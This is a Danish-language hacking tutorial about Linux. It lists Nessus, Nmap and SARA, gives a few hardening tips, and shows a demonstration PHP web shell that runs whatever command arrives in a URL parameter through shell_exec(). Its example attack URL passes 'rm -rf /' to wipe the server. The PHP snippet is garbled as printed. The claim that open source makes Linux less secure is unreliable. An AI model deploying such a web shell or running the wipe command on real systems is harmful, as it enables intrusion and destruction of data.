Hacking Linux OS: Hacking with Ubuntu (Commands Tutorial)

Linux er det mest udbredte serverstyresystem, især til webservere. Det er open source; det betyder, at alle kan få adgang til kildekoden. Dette gør det mindre sikkert sammenlignet med andre styresystemer, da angribere kan studere kildekoden for at finde sårbarheder. Linux for hackere handler om at udnytte disse sårbarheder for at få uautoriseret adgang til et system.

I denne artikel vil vi introducere dig til, hvad Linux er, dets sikkerhedssårbarheder, hacking med Ubuntu og de modforanstaltninger, du kan sætte i værk.

Emner, der behandles i denne vejledning

  • Kort bemærkning om Linux
  • Linux-hackerværktøjer
  • Sådan forhindrer du Linux-hacks
  • Hacking-aktivitet: Hack et Linux-system ved hjælp af PHP

Kort bemærkning om Linux

Linux er et open source-operativsystem. Der findes mange distributioner af Linux-baserede styresystemer såsom Redhat, Fedora og Ubuntu osv. I modsætning til andre styresystemer er Linux mindre sikkert, når det gælder sikkerhed. Det skyldes, at kildekoden er frit tilgængelig, så det er let at undersøge den for sårbarheder og udnytte dem sammenlignet med andre styresystemer, der ikke er open source-styresystemer. Linux kan bruges som styresystem til servere, skriveborde, tablets eller mobile enheder.

Linux-programmer kan betjenes ved hjælp af enten GUI eller kommandoer. Linux-kommandoerne til Kali Linux-hacking er mere effektive og effektive i forhold til at bruge GUI’en. Af denne grund hjælper det at kende de grundlæggende Linux-kommandoer til hacking.

Se disse vejledninger https://www.guru99.com/unix-linux-tutorial.html om, hvordan du kommer i gang med Kali Linux-hacks.

Linux Hacking Tools

  • Nessus- dette værktøj kan bruges til Ubuntu-hack, scanne konfigurationsindstillinger, patches og netværk etc. Det kan findes på https://www.tenable.com/products/nessus
  • NMap. Dette værktøj kan bruges til at overvåge værter, der kører på serveren, og de tjenester, de benytter sig af. Det kan også bruges til at scanne efter porte. Det findes på https://nmap.org/
  • SARA – SARA er en forkortelse for Security Auditor’s Research Assistant (sikkerhedsrevisors forskningsassistent). Som navnet antyder, kan dette værktøj bruges til at auditere netværk mod trusler som SQL-injektion, XSS etc. Det kan findes på http://www-arc.com/sara/sara.html

Ovenstående liste er ikke udtømmende; den giver dig en idé om de værktøjer, der er tilgængelige til Ubuntu-hacking og hacking af Linux-systemer.

Sådan forhindrer du Linux-hacks

Linux Hacking udnytter sårbarhederne i styresystemet. En organisation kan vedtage følgende politik for at beskytte sig mod sådanne angreb.

  • Patch management- patches retter fejl, som angribere udnytter til at kompromittere et system. En god politik for patchhåndtering vil sikre, at du konstant anvender relevante patches til dit system.
  • Korrekt OS-konfiguration- andre exploits udnytter svagheder i serverens konfiguration. Inaktive brugernavne og daemoner bør deaktiveres. Standardindstillinger som f.eks. fælles adgangskoder til applikationer, standardbrugernavne og visse portnumre bør ændres.
  • Intrusion Detection System- sådanne værktøjer kan bruges til at opdage uautoriseret adgang til systemet. Nogle værktøjer har mulighed for at opdage og forhindre sådanne angreb.

Hacking-aktivitet: Hack et Ubuntu Linux-system ved hjælp af PHP

I dette praktiske scenarie vil vi lære at hacke Ubuntu, og vi vil give dig grundlæggende oplysninger om, hvordan du kan bruge PHP til at kompromittere et Linux-system. Vi har ikke tænkt os at målrette noget offer. Hvis du vil prøve det af, kan du installere LAMPP på din lokale maskine.

PHP leveres med to funktioner, der kan bruges til at udføre Linux-hackerkommandoer. Det har funktionerne exec() og shell_exec(). Funktionen exec() returnerer den sidste linje af kommandoens output, mens shell_exec() returnerer hele resultatet af kommandoen som en streng.

Lad os til demonstrationsformål antage, at angriberen leder at uploade følgende fil på en webserver.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

HERE,

Ovenstående script henter kommandoen fra GET-variablen med navnet cmd. Kommandoen udføres ved hjælp af shell_exec(), og resultaterne returneres i browseren.

Ovenstående kode kan udnyttes ved hjælp af følgende URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HERE,

  • “…konsole.php?cmd=ls%20-l “tildeler værdien ls -l til variablen cmd.

Kommandoen i Ubuntu til hacking mod serveren vil blive udført som

shell_exec('ls -l') ;

Udførelse af ovenstående kode på en webserver giver resultater svarende til følgende.

Ovenstående kommando viser blot filerne i den aktuelle mappe og tilladelserne

Lad os antage, at angriberen afleverer følgende kommando

rm -rf /

HER,

  • “rm” fjerner filerne
  • “rf” får rm-kommandoen til at køre i en rekursiv tilstand. Sletter alle mapper og filer
  • “/” instruerer kommandoen om at begynde at slette filer fra rodmappen

Angrebets URL ville se nogenlunde sådan ud

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Sammenfatning

  • Linux er et populært styresystem til servere, desktops, tablets og mobile enheder.
  • Linux er open source, og kildekoden kan fås af alle. Det gør det nemt at opdage sårbarhederne. Det er et af de bedste styresystemer for hackere.
  • Grundlæggende og netværkshacking-kommandoer i Ubuntu er værdifulde for Linux-hackere.
  • Sårbarheder er en svaghed, der kan udnyttes til at kompromittere et system.
  • En god sikkerhed kan være med til at beskytte et system mod at blive kompromitteret af en angriber.

Skriv et svar

Din e-mailadresse vil ikke blive publiceret.